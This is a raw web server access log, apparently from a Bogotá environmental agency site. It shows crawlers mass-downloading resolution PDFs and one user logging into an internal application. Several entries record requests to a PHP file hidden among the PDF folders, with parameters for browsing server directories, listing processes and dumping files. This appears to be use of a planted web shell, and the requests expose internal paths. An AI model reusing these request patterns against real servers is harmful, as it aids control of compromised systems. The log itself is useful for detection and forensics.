52.70.240.171 - - [29/Apr/2024:01:47:46 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1770.pdf HTTP/1.1" 200 373008
3.133.83.109 - - [29/Apr/2024:01:47:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2059.pdf HTTP/1.1" 200 794596
52.70.240.171 - - [29/Apr/2024:01:47:50 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1769.pdf HTTP/1.1" 200 373524
3.133.83.109 - - [29/Apr/2024:01:47:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1544.pdf HTTP/1.1" 200 77089
152.61.128.50 - - [29/Apr/2024:01:47:50 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [29/Apr/2024:01:47:51 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [29/Apr/2024:01:47:52 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
3.147.126.175 - - [29/Apr/2024:01:47:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1775.pdf HTTP/1.1" 200 351954
3.147.193.245 - - [29/Apr/2024:01:47:53 -0500] "GET /BLA/resoluciones/AUTOS%202018/2516.pdf HTTP/1.1" 200 340099
18.118.254.43 - - [29/Apr/2024:01:47:53 -0500] "GET /BLA/resoluciones/AUTOS%202022/6513.pdf HTTP/1.1" 200 510330
3.147.193.245 - - [29/Apr/2024:01:47:54 -0500] "GET /BLA/resoluciones/AUTOS%202023/3517.pdf HTTP/1.1" 200 920372
3.147.193.245 - - [29/Apr/2024:01:47:54 -0500] "GET /BLA/resoluciones/AUTOS%202023/3894.pdf HTTP/1.1" 200 886441
52.70.240.171 - - [29/Apr/2024:01:47:54 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3577.pdf HTTP/1.1" 200 377842
47.128.114.154 - - [29/Apr/2024:01:47:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-content%5Cthemes%5Ctwentyfourteen%5C&f=content-video.php&white=1 HTTP/1.1" 200 1357
18.118.254.43 - - [29/Apr/2024:01:47:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201997/1014.pdf HTTP/1.1" 200 124708
18.118.254.43 - - [29/Apr/2024:01:47:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0643.pdf HTTP/1.1" 200 486940
18.216.153.142 - - [29/Apr/2024:01:47:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2735.pdf HTTP/1.1" 200 515688
3.147.126.175 - - [29/Apr/2024:01:47:56 -0500] "GET /BLA/resoluciones/AUTOS%202022/5099.pdf HTTP/1.1" 200 402138
3.147.126.175 - - [29/Apr/2024:01:47:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1326.pdf HTTP/1.1" 200 411235
3.147.126.175 - - [29/Apr/2024:01:47:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9603.pdf HTTP/1.1" 200 347168
3.147.126.175 - - [29/Apr/2024:01:47:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8276.pdf HTTP/1.1" 200 430039
18.119.14.68 - - [29/Apr/2024:01:47:59 -0500] "GET /BLA/resoluciones/AUTOS%202022/6629.pdf HTTP/1.1" 200 364866
18.119.14.68 - - [29/Apr/2024:01:48:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3835.pdf HTTP/1.1" 200 530363
3.224.220.101 - - [29/Apr/2024:01:48:00 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3575.pdf HTTP/1.1" 200 371076
18.119.14.68 - - [29/Apr/2024:01:48:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4706.pdf HTTP/1.1" 200 628999
18.119.14.68 - - [29/Apr/2024:01:48:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0800.pdf HTTP/1.1" 200 801322
18.119.14.68 - - [29/Apr/2024:01:48:01 -0500] "GET /BLA/resoluciones/AUTOS%202018/2441.pdf HTTP/1.1" 200 341449
3.138.35.149 - - [29/Apr/2024:01:48:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5449.pdf HTTP/1.1" 200 577942
3.146.34.55 - - [29/Apr/2024:01:48:03 -0500] "GET /BLA/resoluciones/AUTOS%202020/2322.pdf HTTP/1.1" 200 328638
3.138.35.149 - - [29/Apr/2024:01:48:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1598.pdf HTTP/1.1" 200 293554
3.146.34.55 - - [29/Apr/2024:01:48:03 -0500] "GET /BLA/resoluciones/AUTOS%202020/2163.pdf HTTP/1.1" 200 1529721
3.224.220.101 - - [29/Apr/2024:01:48:04 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1768.pdf HTTP/1.1" 200 372788
3.224.220.101 - - [29/Apr/2024:01:48:06 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3573.pdf HTTP/1.1" 200 343676
18.226.169.116 - - [29/Apr/2024:01:48:08 -0500] "GET /BLA/resoluciones/AUTOS%202023/3359.pdf HTTP/1.1" 200 2372608
18.116.164.246 - - [29/Apr/2024:01:48:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9457.pdf HTTP/1.1" 200 367382
18.226.169.116 - - [29/Apr/2024:01:48:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4093.pdf HTTP/1.1" 200 527765
52.167.144.233 - - [29/Apr/2024:01:48:10 -0500] "GET /Publicaciones/2023EE132673.pdf HTTP/1.1" 404 228
18.226.169.116 - - [29/Apr/2024:01:48:11 -0500] "GET /BLA/resoluciones/AUTOS%202022/3063.pdf HTTP/1.1" 200 423850
23.22.35.162 - - [29/Apr/2024:01:48:11 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1767.pdf HTTP/1.1" 200 374457
18.226.169.116 - - [29/Apr/2024:01:48:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/6176.pdf HTTP/1.1" 200 490741
18.116.164.246 - - [29/Apr/2024:01:48:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4930.pdf HTTP/1.1" 200 346841
18.116.164.246 - - [29/Apr/2024:01:48:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9192.pdf HTTP/1.1" 200 567531
13.58.177.221 - - [29/Apr/2024:01:48:13 -0500] "GET /BLA/resoluciones/AUTOS%202018/4510.pdf HTTP/1.1" 200 255119
3.224.220.101 - - [29/Apr/2024:01:48:14 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3544.pdf HTTP/1.1" 200 403405
13.58.177.221 - - [29/Apr/2024:01:48:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3187.pdf HTTP/1.1" 200 359917
13.58.177.221 - - [29/Apr/2024:01:48:14 -0500] "GET /BLA/resoluciones/AUTOS%202018/5552.pdf HTTP/1.1" 200 320146
13.58.177.221 - - [29/Apr/2024:01:48:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2834.pdf HTTP/1.1" 200 256925
13.58.177.221 - - [29/Apr/2024:01:48:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1433.pdf HTTP/1.1" 200 308717
18.219.123.232 - - [29/Apr/2024:01:48:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8730.pdf HTTP/1.1" 200 524720
18.219.123.232 - - [29/Apr/2024:01:48:17 -0500] "GET /BLA/resoluciones/AUTOS%202010/5534.pdf HTTP/1.1" 200 636902
18.219.123.232 - - [29/Apr/2024:01:48:18 -0500] "GET /BLA/resoluciones/AUTOS%202018/4505.pdf HTTP/1.1" 200 254292
23.22.35.162 - - [29/Apr/2024:01:48:18 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1763.pdf HTTP/1.1" 200 375049
18.219.123.232 - - [29/Apr/2024:01:48:18 -0500] "GET /BLA/resoluciones/AUTOS%202018/1715.pdf HTTP/1.1" 200 332252
18.219.123.232 - - [29/Apr/2024:01:48:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2784.pdf HTTP/1.1" 200 254406
47.128.61.52 - - [29/Apr/2024:01:48:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=processes&d=E%3A%5Cnuevo%5Clicenses%5CFileZillaFTP%5C&processes_sort=0d HTTP/1.1" 200 3621
23.22.35.162 - - [29/Apr/2024:01:48:22 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3543.pdf HTTP/1.1" 200 399658
18.118.132.146 - - [29/Apr/2024:01:48:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2615.pdf HTTP/1.1" 200 757550
18.118.132.146 - - [29/Apr/2024:01:48:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0486.pdf HTTP/1.1" 200 479892
3.224.220.101 - - [29/Apr/2024:01:48:26 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1762.pdf HTTP/1.1" 200 365131
18.118.132.146 - - [29/Apr/2024:01:48:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3421.pdf HTTP/1.1" 200 297720
18.118.132.146 - - [29/Apr/2024:01:48:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1095.pdf HTTP/1.1" 200 678044
18.118.132.146 - - [29/Apr/2024:01:48:27 -0500] "GET /BLA/resoluciones/AUTOS%202023/3095.pdf HTTP/1.1" 200 1231650
18.216.35.67 - - [29/Apr/2024:01:48:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2617.pdf HTTP/1.1" 200 747443
18.216.35.67 - - [29/Apr/2024:01:48:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0761.pdf HTTP/1.1" 200 346872
23.22.35.162 - - [29/Apr/2024:01:48:30 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3516.pdf HTTP/1.1" 200 846225
18.216.35.67 - - [29/Apr/2024:01:48:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8142.pdf HTTP/1.1" 200 503033
3.17.208.26 - - [29/Apr/2024:01:48:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/3460.pdf HTTP/1.1" 200 378515
3.17.208.26 - - [29/Apr/2024:01:48:32 -0500] "GET /BLA/resoluciones/AUTOS%202022/1121.pdf HTTP/1.1" 200 386115
3.17.208.26 - - [29/Apr/2024:01:48:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0328.pdf HTTP/1.1" 200 1041398
3.17.208.26 - - [29/Apr/2024:01:48:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3053.pdf HTTP/1.1" 200 491943
66.249.66.38 - - [29/Apr/2024:01:48:33 -0500] "GET /mujeres-que-reverdecen-y-sembradoras-por-la-reactivaccion-el-cuidado-y-el-ambiente-de-la-mano-por-bogota.html HTTP/1.1" 200 891
18.217.12.173 - - [29/Apr/2024:01:48:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1385.pdf HTTP/1.1" 200 79415
3.224.220.101 - - [29/Apr/2024:01:48:34 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1745.pdf HTTP/1.1" 200 347194
18.217.12.173 - - [29/Apr/2024:01:48:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6702.pdf HTTP/1.1" 200 545093
18.217.12.173 - - [29/Apr/2024:01:48:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3348.pdf HTTP/1.1" 200 371039
18.217.12.173 - - [29/Apr/2024:01:48:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1663.pdf HTTP/1.1" 200 407820
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12401
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:36 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
52.14.63.59 - - [29/Apr/2024:01:48:37 -0500] "GET /BLA/resoluciones/AUTOS%202010/5461.pdf HTTP/1.1" 200 357357
23.22.35.162 - - [29/Apr/2024:01:48:38 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1743.pdf HTTP/1.1" 200 352079
52.14.63.59 - - [29/Apr/2024:01:48:38 -0500] "GET /BLA/resoluciones/AUTOS%202010/6765.pdf HTTP/1.1" 200 293293
52.14.63.59 - - [29/Apr/2024:01:48:39 -0500] "GET /BLA/resoluciones/AUTOS%202018/4963.pdf HTTP/1.1" 200 261070
185.224.128.43 - - [29/Apr/2024:01:48:39 -0500] "GET / HTTP/1.1" 200 319
13.58.93.51 - - [29/Apr/2024:01:48:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8939.pdf HTTP/1.1" 200 279745
18.118.255.66 - - [29/Apr/2024:01:48:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2691.pdf HTTP/1.1" 200 265877
18.217.118.213 - - [29/Apr/2024:01:48:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/4952.pdf HTTP/1.1" 200 676937
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16909
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
152.202.113.53 - - [29/Apr/2024:01:48:41 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
13.58.93.51 - - [29/Apr/2024:01:48:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9043.pdf HTTP/1.1" 200 505359
13.58.93.51 - - [29/Apr/2024:01:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202023/2725.pdf HTTP/1.1" 200 421026
47.128.117.37 - - [29/Apr/2024:01:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccurtiembres%5Cimages%5C&f=page3_thumbnail.jpg&white=1 HTTP/1.1" 200 3631
3.224.220.101 - - [29/Apr/2024:01:48:42 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3513.pdf HTTP/1.1" 200 1254297
13.58.93.51 - - [29/Apr/2024:01:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/3148.pdf HTTP/1.1" 200 354988
18.118.255.66 - - [29/Apr/2024:01:48:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6264.pdf HTTP/1.1" 200 436209
152.202.113.53 - - [29/Apr/2024:01:48:45 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:45 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
52.70.240.171 - - [29/Apr/2024:01:48:46 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3505.pdf HTTP/1.1" 200 440468
152.202.113.53 - - [29/Apr/2024:01:48:47 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 48377
152.202.113.53 - - [29/Apr/2024:01:48:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.202.113.53 - - [29/Apr/2024:01:48:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1480
52.70.240.171 - - [29/Apr/2024:01:48:50 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1696.pdf HTTP/1.1" 200 332158
52.70.240.171 - - [29/Apr/2024:01:48:54 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1675.pdf HTTP/1.1" 200 329026
3.22.114.143 - - [29/Apr/2024:01:48:55 -0500] "GET /BLA/resoluciones/AUTOS%202022/0226.pdf HTTP/1.1" 200 374174
18.216.153.142 - - [29/Apr/2024:01:48:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4528.pdf HTTP/1.1" 200 335645
3.22.114.143 - - [29/Apr/2024:01:48:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8910.pdf HTTP/1.1" 200 287265
3.22.114.143 - - [29/Apr/2024:01:48:57 -0500] "GET /BLA/resoluciones/AUTOS%202018/1897.pdf HTTP/1.1" 200 275474
3.22.114.143 - - [29/Apr/2024:01:48:58 -0500] "GET /BLA/resoluciones/AUTOS%202022/4912.pdf HTTP/1.1" 200 971810
3.22.114.143 - - [29/Apr/2024:01:48:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0851.pdf HTTP/1.1" 200 479786
3.22.114.143 - - [29/Apr/2024:01:48:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5302.pdf HTTP/1.1" 200 382760
23.22.35.162 - - [29/Apr/2024:01:48:58 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3498.pdf HTTP/1.1" 200 9132572
18.216.153.142 - - [29/Apr/2024:01:49:00 -0500] "GET /BLA/resoluciones/AUTOS%202022/3596.pdf HTTP/1.1" 200 1629141
3.139.106.117 - - [29/Apr/2024:01:49:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3868.pdf HTTP/1.1" 200 1239289
3.139.106.117 - - [29/Apr/2024:01:49:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4933.pdf HTTP/1.1" 200 350583
3.139.106.117 - - [29/Apr/2024:01:49:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2935.pdf HTTP/1.1" 200 449561
23.22.35.162 - - [29/Apr/2024:01:49:02 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1645.pdf HTTP/1.1" 200 348055
3.139.106.117 - - [29/Apr/2024:01:49:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2125.pdf HTTP/1.1" 200 553996
18.226.214.218 - - [29/Apr/2024:01:49:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9510.pdf HTTP/1.1" 200 304609
18.226.214.218 - - [29/Apr/2024:01:49:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1370.pdf HTTP/1.1" 200 1016341
3.224.220.101 - - [29/Apr/2024:01:49:06 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3497.pdf HTTP/1.1" 200 6497797
47.128.124.241 - - [29/Apr/2024:01:49:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Crosewd%5C&f=2.png&imgsize=100 HTTP/1.1" 200 15514
47.128.124.241 - - [29/Apr/2024:01:49:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.124.241 - - [29/Apr/2024:01:49:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.124.241 - - [29/Apr/2024:01:49:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.124.241 - - [29/Apr/2024:01:49:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.124.241 - - [29/Apr/2024:01:49:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.124.241 - - [29/Apr/2024:01:49:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.124.241 - - [29/Apr/2024:01:49:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.124.241 - - [29/Apr/2024:01:49:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.124.241 - - [29/Apr/2024:01:49:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.124.241 - - [29/Apr/2024:01:49:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
52.70.240.171 - - [29/Apr/2024:01:49:10 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1644.pdf HTTP/1.1" 200 348773
3.224.220.101 - - [29/Apr/2024:01:49:14 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3492.pdf HTTP/1.1" 200 451790
18.116.80.2 - - [29/Apr/2024:01:49:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4715.pdf HTTP/1.1" 200 695876
18.116.80.2 - - [29/Apr/2024:01:49:16 -0500] "GET /BLA/resoluciones/AUTOS%202018/5809.pdf HTTP/1.1" 200 263024
23.22.35.162 - - [29/Apr/2024:01:49:18 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1643.pdf HTTP/1.1" 200 344095
3.148.117.195 - - [29/Apr/2024:01:49:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2937.pdf HTTP/1.1" 200 541541
3.148.117.195 - - [29/Apr/2024:01:49:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4529.pdf HTTP/1.1" 200 219499
3.148.117.195 - - [29/Apr/2024:01:49:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1466.pdf HTTP/1.1" 200 429551
3.17.25.60 - - [29/Apr/2024:01:49:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5576.pdf HTTP/1.1" 200 627151
3.17.25.60 - - [29/Apr/2024:01:49:23 -0500] "GET /BLA/resoluciones/AUTOS%202022/3165.pdf HTTP/1.1" 200 406773
52.70.240.171 - - [29/Apr/2024:01:49:23 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1642.pdf HTTP/1.1" 200 346636
3.17.25.60 - - [29/Apr/2024:01:49:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1331.pdf HTTP/1.1" 200 535644
3.17.25.60 - - [29/Apr/2024:01:49:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6116.pdf HTTP/1.1" 200 536943
3.17.25.60 - - [29/Apr/2024:01:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202020/4948.pdf HTTP/1.1" 200 385124
3.224.220.101 - - [29/Apr/2024:01:49:26 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3484.pdf HTTP/1.1" 200 449124
18.222.49.177 - - [29/Apr/2024:01:49:26 -0500] "GET /BLA/resoluciones/AUTOS%202023/04447.pdf HTTP/1.1" 200 374940
18.222.49.177 - - [29/Apr/2024:01:49:27 -0500] "GET /BLA/resoluciones/AUTOS%202022/1032.pdf HTTP/1.1" 200 413527
23.22.35.162 - - [29/Apr/2024:01:49:30 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1641.pdf HTTP/1.1" 200 354696
47.128.58.147 - - [29/Apr/2024:01:49:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=page23.swf&fullhexdump=1 HTTP/1.1" 200 2740
52.70.240.171 - - [29/Apr/2024:01:49:34 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3475.pdf HTTP/1.1" 200 458432
3.16.50.75 - - [29/Apr/2024:01:49:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9352.pdf HTTP/1.1" 200 487119
3.16.50.75 - - [29/Apr/2024:01:49:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0711.pdf HTTP/1.1" 200 178107
